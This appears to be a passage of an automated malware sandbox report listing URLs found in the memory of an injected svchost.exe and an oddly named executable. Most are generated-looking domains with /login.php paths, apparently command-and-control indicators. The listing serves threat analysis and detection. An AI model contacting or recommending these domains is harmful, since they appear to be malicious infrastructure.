http://gatypub.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqeb.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqih.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689012083.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrah.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/http://puvytag.com/http://puvytag.com/http://gatyviw.com/http://gatyviw.com/
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyvyz.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyged.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lygygin.com/login.php
Source: svchost.exe, 00000002.00000003.1661503631.000000000333D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664428957.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913386087.0000000003383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664095073.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661481983.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjan.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lymyxid.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F20000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lymyxid.com/login.php
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjej.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/http://qetylyv.com/http://lyryled.com/http://qekynuq.com/
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryman.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.0000000003364000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytod.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytun.com/login.php
Source: svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lyryvex.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvur.com/
